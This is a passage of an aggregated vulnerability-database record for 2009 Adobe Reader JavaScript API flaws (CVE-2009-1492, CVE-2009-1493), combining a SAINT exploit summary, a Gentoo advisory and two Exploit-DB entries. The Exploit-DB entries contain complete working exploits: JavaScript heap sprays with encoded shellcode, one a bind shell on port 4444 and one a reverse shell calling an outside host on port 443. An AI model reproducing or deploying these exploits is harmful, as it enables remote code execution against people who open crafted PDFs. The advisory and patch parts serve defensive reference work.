[CVE-2009-1493](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1493>) \nBID: [34740](<http://www.securityfocus.com/bid/34740>) \nOSVDB: [54129](<http://www.osvdb.org/54129>) \n\n\n### Background\n\n[Adobe Reader](<http://www.adobe.com/products/reader/>) is free software for viewing PDF documents. \n\n### Problem\n\nA memory corruption vulnerability in the Javascript API in Adobe Reader allows command execution when a user opens a specially crafted PDF file which calls the `**spell.customDictionaryOpen**` method. \n\n### Resolution\n\nApply the patches referenced in [APSB09-06](<http://www.adobe.com/support/security/bulletins/apsb09-06.html>). \n\n### References\n\n<http://www.kb.cert.org/vuls/id/970180> \n\n\n### Limitations\n\nExploit works on Adobe Reader 8.1.3 and 9.1 on Ubuntu 8.04.1 and Red Hat Enterprise Linux 5 with Exec-Shield enabled. Note that binary files AdbeRdr9.1.0-1_i486linux_enu.bin and AdobeReader_enu-8.1.3-1.i486.tar.gz from the official site of the vendor were used to develop this exploit. \n\n### Platforms\n\nLinux \n \n\n", "modified": "2009-05-12T00:00:00", "published": "2009-05-12T00:00:00", "id": "SAINT:CB62BD8F8850085C977A71C34F2176B3", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/adobe_reader_customdictionaryopen", "title": "Adobe Reader Javascript API spell.customDictonaryOpen memory corruption", "type": "saint", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-01T07:40:10", "bulletinFamily": "exploit", "description": "Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit. CVE-2009-1492. Remote exploit for linux platform", "modified": "2009-04-29T00:00:00", "published": "2009-04-29T00:00:00", "id": "EDB-ID:8569", "href": "https://www.exploit-db.com/exploits/8569/", "type": "exploitdb", "title": "Adobe Reader 8.1.4/9.1 GetAnnots Remote Code Execution Exploit", "sourceData": "//##############\n//Exploit made by Arr1val\n//Proved in adobe 9.1 and adobe 8.1.4 on linux\n//\n//Steps:\n//- create a pdf with an annotation (a note) (i used an annotation with a very long AAAAA name, but that might be omitted)\n//- attach the following script to the OpenAction of the pdf.\n//##############\n\nvar memory;\nfunction New_Script()\n{\n\n//if(adobe9)//adobe reader 8 works also with app.setTimeOut?\nvar startwith = app.alert('Hi');//required for adobe9\n\n var nop = unescape(\"%u9090%u9090\"); //long nop will also force the address to go to 0x90909090 so 2 steps in one ;)\n var shellcode = unescape( \"%uc92b%ue983%ud9eb%ud9ee%u2474%u5bf4%u7381%u1313%u2989%u8357%ufceb%uf4e2%u5222%u147a%ue340%u3d2b%ud175%udeb0%u44f2%uc1a9%udb50%u3f4f%ud502%u044f%u689a%u3143%ud94b%u0178%u689a%ud7e4%uefa3%ub4f8%u09de%u057b%uca45%ub6a0%uefa3%ud7e4%ue380%u0e2b%ub6a3%ud7e4%uf05a%ue7d0%udb18%u7841%ufa3c%u3f41%ueb3c%u3940%u6a9a%u047b%u689a%ud7e4\"); //linux bind shell at port 4444\n\n while(nop.length <= 0x100000/2) nop+=nop;\n nop=nop.substring(0,0x100000/2 - shellcode.length);\n\n memory=new Array();\n for(i=0;i<0x6ff;i++) //we should at least overwrite 0x90909090\n {memory[i]=nop + shellcode;}\n\n//start exploit now\nstart();\n\nfunction start()\n{\n this.getAnnots(-134217728,-134217728,-134217728,-134217728);\n}\n\n}\n\n//############################\n\n# milw0rm.com [2009-04-29]\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8569/"}, {"lastseen": "2016-02-01T07:40:18", "bulletinFamily": "exploit", "description": "Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit. CVE-2009-1493. Remote exploit for linux platform", "modified": "2009-04-29T00:00:00", "published": "2009-04-29T00:00:00", "id": "EDB-ID:8570", "href": "https://www.exploit-db.com/exploits/8570/", "type": "exploitdb", "title": "Adobe 8.1.4/9.1 customDictionaryOpen Code Execution Exploit", "sourceData": "//##############\n//Exploit made by Arr1val\n//Proved in adobe 9.1 and adobe 8.1.4 on linux\n//##############\n\nvar memory;\nfunction New_Script()\n{\n\tvar nop = unescape(\"%u9090%u9090\");\nvar shellcode = unescape(\"%uc92b%ue983%ud9ee%ud9ee%u2474%u5bf4%u7381%uc513%u4871%u83a5%ufceb%uf4e2%uaaf4%ue61b%u1b96%ucf4a%u29a3%u44c1%uf108%ufcdb%u4e75%u2585%u088c%ufeb1%u199f%ua442%u88da%ucd2e%ucac4%uc30b%uf896%u15a9%u21a3%uf619%u904c%u680b%u2345%u8a20%u02ea%ucd20%u13ea%ucb21%u924c%uf61a%u904c%uaef8%uf108%ua548\");//443 on 10.1.31.249\n\n\twhile(nop.length <= 0x10000/2) nop+=nop;\n\tnop=nop.substring(0,0x10000/2 - shellcode.length);\n\n\tmemory=new Array();\n\tfor(i=0;i<0x6ff0;i++)\n\t{memory[i]=nop + shellcode;}\n\n//start exploit now\nstart();\n\nfunction start()\n{\n\tthis.spell.customDictionaryOpen(0,nop);//so the exploit jumps actually to 0x90909090. Place a very long 'AAAA' at the second param to go to 0x41414141 ;)\n}\n\n}\n\n//############################\n\n# milw0rm.com [2009-04-29]\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8570/"}], "gentoo": [{"lastseen": "2016-09-06T19:46:37", "bulletinFamily": "unix", "description": "### Background\n\nAdobe Reader is a PDF reader released by Adobe. \n\n### Description\n\nMultiple vulnerabilities have been reported in Adobe Reader: \n\n * Alin Rad Pop of Secunia Research reported a heap-based buffer overflow in the JBIG2 filter (CVE-2009-0198). \n * Mark Dowd of the IBM Internet Security Systems X-Force and Nicolas Joly of VUPEN Security reported multiple heap-based buffer overflows in the JBIG2 filter (CVE-2009-0509, CVE-2009-0510, CVE-2009-0511, CVE-2009-0512, CVE-2009-0888, CVE-2009-0889) \n * Arr1val reported that multiple methods in the JavaScript API might lead to memory corruption when called with crafted arguments (CVE-2009-1492, CVE-2009-1493). \n * An anonymous researcher reported a stack-based buffer overflow related to U3D model files with a crafted extension block (CVE-2009-1855). \n * Jun Mao and Ryan Smith of iDefense Labs reported an integer overflow related to the FlateDecode filter, which triggers a heap-based buffer overflow (CVE-2009-1856). \n * Haifei Li of Fortinet's FortiGuard Global Security Research Team reported a memory corruption vulnerability related to TrueType fonts (CVE-2009-1857). \n * The Apple Product Security Team reported a memory corruption vulnerability in the JBIG2 filter (CVE-2009-1858). \n * Matthew Watchinski of Sourcefire VRT reported an unspecified memory corruption (CVE-2009-1859). \n * Will Dormann of CERT reported multiple heap-based buffer overflows when processing JPX (aka JPEG2000) stream that trigger heap memory corruption (CVE-2009-1861). \n * Multiple unspecified vulnerabilities have been discovered (CVE-2009-2028). \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted document, possibly resulting in the execution of arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll Adobe Reader users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-text/acroread-8.1.6\"", "modified": "2009-07-12T00:00:00", "published": "2009-07-12T00:00:00", "id": "GLSA-200907-06", "href": "https://security.gentoo.org/glsa/200907-06", "type": "gentoo", "title": "Adobe Reader: User-assisted execution of arbitrary code", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}